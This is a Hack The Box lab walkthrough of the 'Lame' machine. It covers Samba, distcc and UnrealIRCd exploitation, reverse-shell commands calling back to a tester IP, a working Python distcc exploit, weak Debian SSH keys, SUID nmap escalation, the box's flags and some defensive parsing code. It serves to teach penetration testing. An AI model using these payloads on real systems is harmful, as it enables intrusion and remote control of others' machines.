0xdf hacks stuff
HTB has a Guided Mode that walks through the box step by step; I followed it to learn the thought process. This time I reproduced two routes.
FTP + SMB

Task 1 How many of the nmap top 1000 TCP ports are open on the remote host?

When no ports are specified, nmap scans the top 1000 ports by default; the number can also be set explicitly with --top-ports X.
Task 2 What version of VSFTPd is running on Lame?

We need a more detailed nmap scan:

```
nmap -Pn -sVC -p21,22,139,445 -oN namp.txt 10.10.10.3

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.47
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h51m54s, deviation: 2h49m45s, median: -8m08s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-08-07T02:42:47-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
```
-Pn tells nmap to treat every host as online and skip host discovery. In some cases this speeds the scan up, but it can also produce misleading results for hosts that are actually down. -sVC combines -sV (probe open ports for service and version information) and -sC (run the default script set). From the output, the vsftpd version is 2.3.4.
Task 3 There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?

Search for the version in msf and select the module:

```
use 0           # select the module
show options    # list the parameters that need to be set
```

Set the target as required:

```
set rhosts 10.10.10.3
run
```

It does not work.
Task 4 What version of Samba is running on Lame? Give the numbers up to but not including “-Debian”.

Already shown in Task 2: 3.0.20

Task 5 What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the “username map script” option is enabled in smb.conf?

```
search Samba 3.0.20
info 0
```
Task 6 Exploiting CVE-2007-2447 returns a shell as which user?

What comes back is a bare reverse shell, not yet upgraded to a proper TTY, and it is /bin/sh; switch it to /bin/bash:

```
which python
python -c "import pty;pty.spawn('/bin/bash')"
```
USER & ROOT (Tasks 7 and 8)

Flag in /home/makis: 8ad91010428cb97ef9a4a407ce120e3a
Root flag in /~: ec4867f5f710918dcb6072cd611f1feb
Task 9 (see 0xdf's write-up, HTB: Lame)

We’ll explore a bit beyond just getting a root shell on the box. While the official writeup doesn’t cover this, you can look at 0xdf’s write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the box’s external IP, so they should be accessible. What must be blocking connection to these ports?

```
netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      5480/xinetd
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      5480/xinetd
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      5480/xinetd
tcp        0      0 0.0.0.0:59523           0.0.0.0:*               LISTEN      5373/rpc.mountd
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      5581/jsvc
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      5643/unrealircd
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      5168/mysqld
tcp        0      0 0.0.0.0:42570           0.0.0.0:*               LISTEN      4641/rpc.statd
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      5622/rmiregistry
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      5643/unrealircd
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      5451/smbd
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      5642/Xtightvnc
tcp        0      0 0.0.0.0:53454           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      4623/portmap
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      5642/Xtightvnc
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      5601/apache2
tcp        0      0 0.0.0.0:41235           0.0.0.0:*               LISTEN      5622/rmiregistry
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      5626/ruby
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      5581/jsvc
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      5480/xinetd
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      5480/xinetd
tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      5021/named
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      5021/named
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      5480/xinetd
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      5250/postgres
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      5441/master
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      5021/named
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      5451/smbd
tcp6       0      0 :::2121                 :::*                    LISTEN      5519/proftpd: (acce
tcp6       0      0 :::3632                 :::*                    LISTEN      5305/distccd
tcp6       0      0 :::53                   :::*                    LISTEN      5021/named
tcp6       0      0 :::22                   :::*                    LISTEN      5045/sshd
tcp6       0      0 :::5432                 :::*                    LISTEN      5250/postgres
tcp6       0      0 ::1:953                 :::*                    LISTEN      5021/named
```
If the trigger succeeds, the shell is served on port 6200; most likely the firewall is not letting 6200 through. For example, test it from inside the box:

```
su - makis -c bash   # switch to makis
nc 127.0.0.1 6200
```

firewall
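To make the Task 9 reasoning mechanical, here is an added example (not from the original post) that parses netstat -tnlp output, keeps the sockets bound to a wildcard or the box's external address, and subtracts the ports nmap reported open; whatever remains is listening but blocked on the way in. The netstat text is a constructed excerpt of the listing above.

```python
import re

# Constructed excerpt in the format of the `netstat -tnlp` listing above (not the full output).
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      5480/xinetd
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      5451/smbd
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      5168/mysqld
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      5021/named
tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      5021/named
tcp6       0      0 :::22                   :::*                    LISTEN      5045/sshd
tcp6       0      0 :::3632                 :::*                    LISTEN      5305/distccd
"""

# proto, recv-q, send-q, local addr:port, foreign addr, LISTEN, pid/program
LINE_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(\S+)")


def parse_listeners(text):
    """Return a list of (port, bind_address, program) for every LISTEN line."""
    listeners = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            addr, port, prog = m.groups()
            listeners.append((int(port), addr, prog))
    return listeners


def externally_reachable(listeners, host_ip):
    """Ports whose socket is bound to a wildcard or to the box's own external address.
    Loopback-only sockets (127.0.0.1, ::1) are excluded: they are never visible from outside."""
    return {port for port, addr, _ in listeners if addr in ("0.0.0.0", "::", host_ip)}


def filtered_ports(listeners, host_ip, nmap_open):
    """Listening on an external address yet not open in the nmap scan: something in
    between (on Lame, the host firewall) must be dropping the connections."""
    return sorted(externally_reachable(listeners, host_ip) - set(nmap_open))


if __name__ == "__main__":
    ls = parse_listeners(NETSTAT_SAMPLE)
    print("blocked:", filtered_ports(ls, "10.10.10.3", [21, 22, 139, 445]))
```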
Task 10 When the VSFTPd backdoor is triggered, what port starts listening?

6200

Task 11 When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?

yes. Reproducing it showed that although nothing seems to happen from the remote side, connecting to the port locally with nc does hand back a root shell. In other words the only obstacle is the firewall: 6200 is not exposed externally, but the backdoor itself does fire.
distcc + Privesc (HTB: More Lame)

The distcc (3632) route does not always work: after I had used it, it stopped working when I came back later to test other things.

A normal scan does not detect the distcc service. nmap has a script for it, but it is not part of the default script set, so we save it locally.

```
# find where the scripts are stored
locate *.nse | head
```

That is /usr/share/nmap/scripts/.

```
wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
```

Now a targeted nmap scan of that port works:
```
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687
```
The id command has been executed and its output returned. Next, a reverse shell:

```
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc -e /bin/sh 10.10.14.47 7777'"
```

That gives a shell. Upgrade it:

```
which python
python -c "import pty;pty.spawn('/bin/bash')"
```
Note that with these privileges we cannot read root.txt. Look at root's authorized public key:

```
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
```

Why is this user msfadmin@metasploitable?
Root via weak SSH key (GitHub - g0tmi1k/debian-ssh: Debian OpenSSL Predictable PRNG (CVE-2008-0166))

Clone the archive locally:

```
git clone https://github.com/g0tmi1k/debian-ssh
```

It is about 440 MB, so a mirror or proxy is recommended.

```
cd debian-ssh/common_keys
tar jxf debian_ssh_rsa_2048_x86.tar.bz2
```

Recursively search for the file containing this public key:

```
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
```
-l prints only the names of matching files rather than the matching lines; -r searches the directory and its subdirectories recursively. Then connect using the matching private key:

```
ssh -i 57c3115d77c56390332dc5c49978627a-5429.pub root@10.10.10.3
```

Here I got an error:

```
Unable to negotiate with 10.10.10.3 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
```

The fix is simple: add the following to your ~/.ssh/config:

```
Host 10.10.10.3
    HostKeyAlgorithms +ssh-rsa
    PubkeyAcceptedKeyTypes +ssh-rsa
```

Then the connection goes through.
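An added example (not the author's code) for the defender's side of the same check: instead of grepping the whole archive for the key text, compute each authorized_keys entry's fingerprint and RSA modulus size and compare it against a set of known-weak fingerprints. The key is the one from /root/.ssh/authorized_keys above; the weak-fingerprint set is assumed to be supplied by the operator (the archive's file names look like MD5 fingerprints, but that mapping is an assumption this example does not rely on).

```python
import base64
import hashlib
import struct

# The key from /root/.ssh/authorized_keys on Lame, as listed above.
AUTHORIZED_KEYS = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable\n"
)


def _read_string(blob, off):
    """Decode one SSH wire-format string (uint32 big-endian length, then bytes)."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def parse_key(line):
    """Return (type, md5_hex, sha256_b64, modulus_bits, comment) for one authorized_keys line.
    Both fingerprints hash the raw key blob, the same bytes ssh-keygen -l hashes."""
    ktype, b64, *rest = line.split()
    blob = base64.b64decode(b64)
    md5_hex = hashlib.md5(blob).hexdigest()
    sha256_b64 = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    bits = None
    wire_type, off = _read_string(blob, 0)
    if wire_type == b"ssh-rsa":
        _e, off = _read_string(blob, off)   # public exponent (not needed here)
        n, _ = _read_string(blob, off)      # modulus; its size says which archive to check
        bits = int.from_bytes(n, "big").bit_length()
    return ktype, md5_hex, sha256_b64, bits, " ".join(rest)


def find_weak(text, weak_md5):
    """Comments of the keys whose MD5 fingerprint appears in the known-weak set."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        _, md5_hex, _, _, comment = parse_key(line)
        if md5_hex in weak_md5:
            hits.append(comment)
    return hits


if __name__ == "__main__":
    # The weak set would normally be loaded from a blacklist file; print the fingerprints instead.
    print(parse_key(AUTHORIZED_KEYS.strip())[1:4])
```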
SUID nmap

Find SUID/SGID files:

```
find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls
16466   68 -rwsr-xr-x   1 root     root        63584 Apr 14  2008 /bin/umount
16449   20 -rwsr-xr--   1 root     fuse        20056 Feb 26  2008 /bin/fusermount
16398   28 -rwsr-xr-x   1 root     root        25540 Apr  2  2008 /bin/su
16418   84 -rwsr-xr-x   1 root     root        81368 Apr 14  2008 /bin/mount
16427   32 -rwsr-xr-x   1 root     root        30856 Dec 10  2007 /bin/ping
16457   28 -rwsr-xr-x   1 root     root        26684 Dec 10  2007 /bin/ping6
 8370   68 -rwsr-xr-x   1 root     root        65520 Dec  2  2008 /sbin/mount.nfs
 8252   20 -rwxr-sr-x   1 root     shadow      19584 Apr  9  2008 /sbin/unix_chkpwd
304747    4 -rwsr-xr--   1 root     dhcp         2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
344359  112 -rwsr-xr-x   2 root     root       107776 Feb 25  2008 /usr/bin/sudoedit
345080    4 -rwxr-sr-x   1 root     utmp         3192 Apr 22  2008 /usr/bin/Eterm
344440    8 -rwsr-sr-x   1 root     root         7460 Jun 25  2008 /usr/bin/X
344089    8 -rwxr-sr-x   1 root     tty          8192 Dec 12  2007 /usr/bin/bsd-write
344958   12 -rwsr-xr-x   1 root     root         8524 Nov 22  2007 /usr/bin/netkit-rsh
344366   80 -rwxr-sr-x   1 root     ssh         76580 Apr  6  2008 /usr/bin/ssh-agent
344139   40 -rwsr-xr-x   1 root     root        37360 Apr  2  2008 /usr/bin/gpasswd
344689   32 -rwxr-sr-x   1 root     mlocate     30508 Mar  8  2008 /usr/bin/mlocate
344364   28 -rwxr-sr-x   1 root     crontab     26928 Apr  8  2008 /usr/bin/crontab
344317   16 -rwsr-xr-x   1 root     root        12296 Dec 10  2007 /usr/bin/traceroute6.iputils
344359  112 -rwsr-xr-x   2 root     root       107776 Feb 25  2008 /usr/bin/sudo
344959   12 -rwsr-xr-x   1 root     root        12020 Nov 22  2007 /usr/bin/netkit-rlogin
344550   40 -rwxr-sr-x   1 root     shadow      37904 Apr  2  2008 /usr/bin/chage
344284  308 -rwxr-sr-x   1 root     utmp       308228 Oct 23  2007 /usr/bin/screen
344220   20 -rwxr-sr-x   1 root     shadow      16424 Apr  2  2008 /usr/bin/expiry
344230   12 -rwsr-xr-x   1 root     root        11048 Dec 10  2007 /usr/bin/arping
345067  304 -rwxr-sr-x   1 root     utmp       306996 Jan  2  2009 /usr/bin/xterm
344365   20 -rwsr-xr-x   1 root     root        19144 Apr  2  2008 /usr/bin/newgrp
344337   12 -rwxr-sr-x   1 root     tty          9960 Apr 14  2008 /usr/bin/wall
344429   28 -rwsr-xr-x   1 root     root        28624 Apr  2  2008 /usr/bin/chfn
344956  768 -rwsr-xr-x   1 root     root       780676 Apr  8  2008 /usr/bin/nmap
344441   24 -rwsr-xr-x   1 root     root        23952 Apr  2  2008 /usr/bin/chsh
344957   16 -rwsr-xr-x   1 root     root        15952 Nov 22  2007 /usr/bin/netkit-rcp
344771   32 -rwsr-xr-x   1 root     root        29104 Apr  2  2008 /usr/bin/passwd
344792   48 -rwsr-xr-x   1 root     root        46084 Mar 31  2008 /usr/bin/mtr
354594   12 -r-xr-sr-x   1 root     postdrop    10312 Apr 18  2008 /usr/sbin/postqueue
354659   12 -r-xr-sr-x   1 root     postdrop    10036 Apr 18  2008 /usr/sbin/postdrop
354626  268 -rwsr-xr--   1 root     dip        269256 Oct  4  2007 /usr/sbin/pppd
369987    8 -rwsr-xr--   1 root     telnetd      6040 Dec 17  2006 /usr/lib/telnetlogin
385106   12 -rwsr-xr--   1 root     www-data    10276 Mar  9  2010 /usr/lib/apache2/suexec
386116    8 -rwsr-xr-x   1 root     root         4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
377149  168 -rwsr-xr-x   1 root     root       165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
371390   12 -rwsr-xr-x   1 root     root         9624 Aug 17  2009 /usr/lib/pt_chown
 8415   16 -r-sr-xr-x   1 root     root        14320 Nov  3  2020 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
16687   12 -r-sr-xr-x   1 root     root         9532 Nov  3  2020 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
```
Note /usr/bin/nmap in the listing. Look it up on GTFOBins:

https://gtfobins.github.io/#nmap

We use the second method directly:

```
nmap --interactive
nmap> !sh
```

In the resulting id output, uid=1(daemon) means the user ID is 1, user daemon; the UID uniquely identifies a user on the system. gid=1(daemon) means the group ID is 1, group daemon; the GID identifies the group the user belongs to. euid=0(root) means the effective user ID is 0, root; the effective UID decides what a process is allowed to do, so here the process has root's privileges. groups=1(daemon) lists the user's groups, here only the daemon group with GID 1. So this gives us root privileges.
UnrealIRCd

Check the listening services; port 6697 here is IRC.

```
netstat -tnlp | grep 6697
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
```

Check the process: unrealircd runs as root.

```
ps auxww | grep unrealircd
root      5643  0.0  0.4   8540  2360 ?        S    Aug06   0:02 /usr/bin/unrealircd
daemon   10501  0.0  0.1   3004   752 pts/6    R+   06:27   0:00 grep unrealircd
```

Connect to the port with nc; the banner identifies the server as Metasploitable (surprising?):

```
daemon@lame:/root$ nc 127.0.0.1 6697
nc 127.0.0.1 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
ERROR :Closing Link: [127.0.0.1] (Ping timeout)
```

See HTB: Irked:

```
echo "AB; nc -e /bin/sh 10.10.14.47 443" | nc 127.0.0.1 6697
```

Wow, that's wild.
distcc exploitation

Since the distcc port on the target could no longer be used, I won't go into much more analysis for now. By capturing the nmap distcc script's traffic with Wireshark you can build a PoC; the bytes can be replayed with nc.

```
root@kali
DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV0000000csh -c '(id)'ARGV00000001
DONE00000001STAT00000000SERR00000000SOUT0000002duid=1(daemon) gid=1(daemon) groups=1(daemon)
DOTO00000000Ncat: Connection reset by peer.
```

Python version:

```python
import socket
import sys

if len(sys.argv) != 4:
    print(f"{sys.argv[0]} [ip] [port] [command]")
    sys.exit(1)

_, ip, port, cmd = sys.argv
# marker that brackets the command output inside the distcc response
mask = "0xdffdx0"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
full_cmd = f"sh -c '(echo -n {mask};{cmd};echo -n {mask})'"
# same token layout as the capture above; ARGV lengths are 8 hex digits
payload = f"""DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV{len(full_cmd):8x}{full_cmd}ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI00000001A"""
s.send(payload.encode())
resp = s.recv(4096)
print(resp.decode(errors="ignore").split(mask)[1].strip())
```
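As an added example (not the author's code), the same wire format from the defender's side: a parser for distcc requests like the one in the capture, decoding the DIST/ARGC/ARGV/DOTI tokens and flagging requests whose argv[0] is not a compiler or whose arguments carry shell metacharacters, which is what CVE-2004-2687 abuse looks like in a packet capture or a distccd wrapper. Both sample requests are constructed (the first mirrors the nmap script's request above), and the compiler allowlist is my assumption.

```python
# Constructed requests in the distcc wire format seen in the capture above:
# ABUSE_REQUEST mirrors the nmap distcc-exec request, BENIGN_REQUEST is an ordinary compile job.
ABUSE_REQUEST = (
    b"DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV0000000csh -c '(id)'"
    b"ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.o"
    b"DOTI00000001A"
)
BENIGN_REQUEST = (
    b"DIST00000001ARGC00000005ARGV00000003gccARGV00000002-cARGV00000006main.c"
    b"ARGV00000002-oARGV00000006main.oDOTI00000001A"
)
# Assumed allowlist: the only programs a distcc volunteer should ever be asked to run.
COMPILERS = {"gcc", "cc", "g++", "c++", "clang", "clang++"}


def parse_request(data):
    """Decode a distcc request. Each token is a 4-char name plus 8 hex digits;
    for ARGV and DOTI the number is a byte length and that many bytes follow."""
    req = {"argv": [], "doti_len": 0}
    off = 0
    while off + 12 <= len(data):
        name = data[off:off + 4].decode("ascii")
        val = int(data[off + 4:off + 12], 16)
        off += 12
        if name == "ARGV":
            req["argv"].append(data[off:off + val].decode("utf-8", "replace"))
            off += val
        elif name == "DOTI":
            req["doti_len"] = len(data[off:off + val])
            off += val
        elif name == "DIST":
            req["version"] = val
        elif name == "ARGC":
            req["argc"] = val
        else:
            raise ValueError(f"unexpected token {name!r} at offset {off - 12}")
    return req


def suspicious(req):
    """Reasons a request looks like CVE-2004-2687 abuse rather than a compile job."""
    reasons = []
    argv = req["argv"]
    head = argv[0] if argv else None
    if req.get("argc") != len(argv):
        reasons.append("ARGC disagrees with the number of ARGV tokens")
    if head not in COMPILERS:
        reasons.append(f"argv[0] is {head!r}, not a compiler")
    if any(c in a for a in argv for c in ";|&`$("):
        reasons.append("shell metacharacters in arguments")
    return reasons
```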